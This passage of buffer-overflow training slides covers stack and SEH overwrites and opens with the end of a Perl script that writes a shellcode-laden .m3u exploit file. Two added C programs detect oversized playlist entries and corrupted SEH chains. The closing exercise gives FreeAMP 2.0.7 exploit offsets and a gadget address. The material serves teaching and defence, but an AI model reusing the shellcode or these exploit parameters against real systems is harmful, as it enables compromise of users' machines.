"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                         # write raw bytes, no newline translation
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "m3u File Created successfully\n";
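Slides 18 and 19 give the shape of exploit.m3u: a single playlist entry of 26037 bytes of padding followed by a packed address, a NOP sled and shellcode. The C below is an added example, not code from the slides: a pre-parse check that measures the longest entry in a playlist and counts control and high bytes, flagging the file when an entry exceeds a length limit or contains control bytes. MAX_ENTRY, the benign sample and the oversized sample are my assumptions; the oversized sample reuses the slide's padding length and address bytes followed by a NOP sled, without the shellcode.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example (not from the slides). Slides 18-19 build exploit.m3u as one
 * playlist entry: 26037 bytes of padding, then a packed address, then a NOP
 * sled and shellcode. A pre-parse check can reject such a file before a
 * fragile parser copies the entry into a fixed buffer. MAX_ENTRY is an
 * assumed policy limit; real .m3u entries are paths and #EXTINF lines. */

#define MAX_ENTRY 1024   /* assumed limit on one playlist line, in bytes */

struct scan_result {
    size_t longest_entry;   /* longest line seen, in bytes, excluding '\n' */
    size_t control_bytes;   /* bytes < 0x20 other than CR, LF, TAB */
    size_t high_bytes;      /* bytes >= 0x80 (UTF-8 in titles is legitimate, so not fatal) */
    bool   suspicious;      /* true if a line is too long or control bytes were seen */
};

struct scan_result scan_playlist(const unsigned char *data, size_t len)
{
    struct scan_result r = {0, 0, 0, false};
    size_t line_len = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = data[i];
        if (c == '\n') {                         /* end of one entry */
            if (line_len > r.longest_entry) r.longest_entry = line_len;
            line_len = 0;
            continue;
        }
        line_len++;
        if (c >= 0x80)
            r.high_bytes++;
        else if (c < 0x20 && c != '\r' && c != '\t')
            r.control_bytes++;
    }
    if (line_len > r.longest_entry)              /* file may lack a final newline */
        r.longest_entry = line_len;
    r.suspicious = r.longest_entry > MAX_ENTRY || r.control_bytes > 0;
    return r;
}

/* Constructed benign playlist. */
static const char BENIGN_M3U[] =
    "#EXTM3U\n"
    "#EXTINF:213,Example Artist - Example Song\n"
    "C:\\Music\\example.mp3\n";

struct scan_result scan_benign_sample(void)
{
    return scan_playlist((const unsigned char *)BENIGN_M3U, sizeof BENIGN_M3U - 1);
}

/* Constructed oversized entry with the same structure as slide 19's file:
 * 26037 'A's, the 4 address bytes of pack('V', 0x7608fcfe), then 25 NOPs.
 * The shellcode itself is left out; it is not needed to trip the check. */
struct scan_result scan_constructed_overflow_sample(void)
{
    const size_t junk = 26037, addr = 4, sled = 25;
    size_t len = junk + addr + sled;
    unsigned char *buf = malloc(len);
    if (!buf) { struct scan_result empty = {0, 0, 0, false}; return empty; }
    memset(buf, 'A', junk);
    memcpy(buf + junk, "\xfe\xfc\x08\x76", addr);
    memset(buf + junk + addr, 0x90, sled);
    struct scan_result r = scan_playlist(buf, len);
    free(buf);
    return r;
}

int main(void)
{
    struct scan_result b = scan_benign_sample(), m = scan_constructed_overflow_sample();
    printf("benign:   longest=%zu control=%zu high=%zu suspicious=%d\n",
           b.longest_entry, b.control_bytes, b.high_bytes, b.suspicious);
    printf("oversize: longest=%zu control=%zu high=%zu suspicious=%d\n",
           m.longest_entry, m.control_bytes, m.high_bytes, m.suspicious);
    return 0;
}
```

High bytes are reported but not treated as fatal on their own, because non-ASCII titles and paths are normal in playlists; the length limit and the presence of control bytes are what separate the slide's file from real input.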
20. Overwrite SEH (Error Handler)
Structured Exception Handler (SEH)
The exception-handling mechanism provided by Windows
Uses exception handlers
21. Exception Handler
An exception handler is a piece of code inside an application whose purpose is to deal with exceptions raised in that application
(a typical exception-handling construct is shown below)
try {
// run stuff. if an exception occurs, go to <catch> code
}
catch {
// run stuff when exception occurs
}
22. Exception Handler
Stack layout (high address at top):
  Exception Handler
  Arguments
  Return Address
  Stack Frame Pointer
  Local Variables (buffer area)
  (low address)
try {
// run stuff. if an exception occurs, go to <catch> code
}
catch {
// run stuff when exception occurs
}
23. Exception Handler
An exception handler has two pointers:
a pointer to the next exception handler structure
a pointer to the actual address of the exception handler (SE Handler)
Stack layout (high address at top):
  Exception Handler
  Arguments
  Return Address
  Stack Frame Pointer
  Local Variables (buffer area)
  (low address)
Exception Handler record:
  Next Exception Handler Address
  Exception Handler Address
25. Track3. Exploitation Overwrite SEH
Stack layout (high address at top):
  pointer to next SEH record
  pointer to SEH Handler
  Arguments
  Return Address
  Stack Frame Pointer
  Local Variables (buffer area)
  (low address)
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from the buffer (low address) up toward the SEH record (high address)
26. Track3. Exploitation Overwrite SEH
Stack layout (high address at top); strcpy has begun copying 'A's into the buffer:
  pointer to next SEH record
  pointer to SEH Handler
  Arguments
  Return Address
  Stack Frame Pointer
  Local Variables (buffer area)  <- A A A A
                                    A A A A
  (low address)
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from the buffer (low address) up toward the SEH record (high address)
27. Track3. Exploitation Overwrite SEH
Stack layout (high address at top); the 'A's have run through every field up to and past the SEH record:
  A A A A
  pointer to next SEH record     <- A A A A
  pointer to SEH Handler         <- A A A A
  Arguments
  Return Address
  Stack Frame Pointer
  Local Variables (buffer area)  <- A A A A
                                    A A A A
                                    A A A A
                                    A A A A
  (low address)
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from the buffer (low address) up toward the SEH record (high address)
29. Overwrite SEH
Stack layout (high address at top); final payload:
  pointer to next SEH record     <- jmp to shellcode
  pointer to SEH Handler         <- pop/pop/ret
  Arguments
  Return Address
  Stack Frame Pointer
  Local Variables (buffer area)  <- A A A A (Padding)
                                    C o d e
                                    S h e l l
                                    A A A A
  (low address)
Calling .Start function:
.Start :
push %ebp
mov %esp, %ebp
sub $0xC, %esp
...
strcpy(buf,argv[1]);
...
leave
ret
Writing direction: from the buffer (low address) up toward the SEH record (high address)
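Slides 23 to 29 describe the SEH record as two pointers on the stack and show both the 'A'-flooded state and the final jmp / pop-pop-ret layout. The C below is an added example, not code from the slides: a chain walker run over a constructed stack image that applies the two sanity rules a debugger's exception-chain view relies on (the next pointer is a higher stack address or the end-of-chain marker; the handler lies inside module code) and reports the first record that breaks them. The stack and module ranges, the record addresses and the intact handler values are constructed; the only page value reused is the slide 32 gadget address for the overwritten variant.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example (not from the slides). Slides 23-29 describe the SEH record
 * as two 32-bit fields on the stack: a pointer to the next record, then a
 * pointer to the handler. In an intact chain every "next" is a higher stack
 * address and the chain ends at 0xFFFFFFFF; handlers point into module code.
 * After the overwrite on slide 29 the "next" field holds a short jump (not a
 * stack address) and the handler a pop/pop/ret gadget; on slides 27-28 both
 * fields are 0x41414141. This walker, over a constructed stack image, flags
 * the first record that breaks either rule. */

#define IMG_LEN    0x1000u
#define STACK_BASE 0x0012f000u              /* assumed: where the image lives */
#define MOD_LO     0x00401000u              /* assumed: code range of the process image */
#define MOD_HI     0x00440000u

static uint32_t rd32(const uint8_t *p, size_t off)
{
    return (uint32_t)p[off] | (uint32_t)p[off + 1] << 8 |
           (uint32_t)p[off + 2] << 16 | (uint32_t)p[off + 3] << 24;
}

static void wr32(uint8_t *p, size_t off, uint32_t v)
{
    p[off] = v & 0xff;             p[off + 1] = (v >> 8) & 0xff;
    p[off + 2] = (v >> 16) & 0xff; p[off + 3] = (v >> 24) & 0xff;
}

/* Walk the chain from `head`. Returns the number of records inspected; *bad
 * receives the index of the first record failing a check, or -1 if clean. */
int walk_seh(const uint8_t *img, uint32_t head, int max_records, int *bad)
{
    int n = 0;
    uint32_t cur = head;
    *bad = -1;
    while (n < max_records && cur != 0xFFFFFFFFu) {
        if (cur < STACK_BASE || cur > STACK_BASE + IMG_LEN - 8) { *bad = n; return n; }
        size_t off = cur - STACK_BASE;
        uint32_t next = rd32(img, off), handler = rd32(img, off + 4);
        n++;
        bool handler_in_module = handler >= MOD_LO && handler < MOD_HI;
        bool next_on_stack = next == 0xFFFFFFFFu ||
                             (next > cur && next <= STACK_BASE + IMG_LEN - 8);
        if (!handler_in_module || !next_on_stack) { *bad = n - 1; return n; }
        cur = next;
    }
    return n;
}

/* Constructed 4 KiB stack image. variant 0: intact two-record chain;
 * 1: first record overwritten as on slide 29 ("next" = the dword a short
 *    jump plus two NOPs occupies, handler = the slide 32 gadget 0x004027BF,
 *    which does lie inside the module, so only the "next" rule catches it);
 * 2: first record flooded with 'A's as on slides 27-28. */
static void build_image(uint8_t *img, int variant)
{
    memset(img, 0, IMG_LEN);
    wr32(img, 0x100, STACK_BASE + 0x800); wr32(img, 0x104, 0x00405010u);  /* record 0 */
    wr32(img, 0x800, 0xFFFFFFFFu);        wr32(img, 0x804, 0x00401a20u);  /* record 1 (last) */
    if (variant == 1) { wr32(img, 0x100, 0x909006ebu); wr32(img, 0x104, 0x004027bfu); }
    if (variant == 2) { wr32(img, 0x100, 0x41414141u); wr32(img, 0x104, 0x41414141u); }
}

int first_bad_record(int variant)
{
    uint8_t img[IMG_LEN];
    int bad;
    build_image(img, variant);
    walk_seh(img, STACK_BASE + 0x100, 16, &bad);
    return bad;
}

int records_walked(int variant)
{
    uint8_t img[IMG_LEN];
    int bad;
    build_image(img, variant);
    return walk_seh(img, STACK_BASE + 0x100, 16, &bad);
}

int main(void)
{
    for (int v = 0; v < 3; v++)
        printf("variant %d: %d record(s) walked, first bad record: %d\n",
               v, records_walked(v), first_bad_record(v));
    return 0;
}
```

The module-range test alone is not enough, as variant 1 shows: a pop/pop/ret handler taken from the process image passes it. The "next pointer is a higher stack address" rule is what exposes a record whose first field has been replaced by instruction bytes, which is why a crash triage should check both fields.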
30. Exercise Time :D
Target Info
Win32
FreeAMP Audio Player
v.2.0.7
Download Link is
(http://outofcontrol.co.kr/vulnApp/FreeAmp.zip)
Vulnerability Type
Buffer Overflow (Stack Based)
by Parsing Playlist
32. Exercise Time :D
Exploit Info
.pls Playlist File Format
length of junk data is 893
gadget is 0x004027BF (pop/pop/ret from freeamp.exe)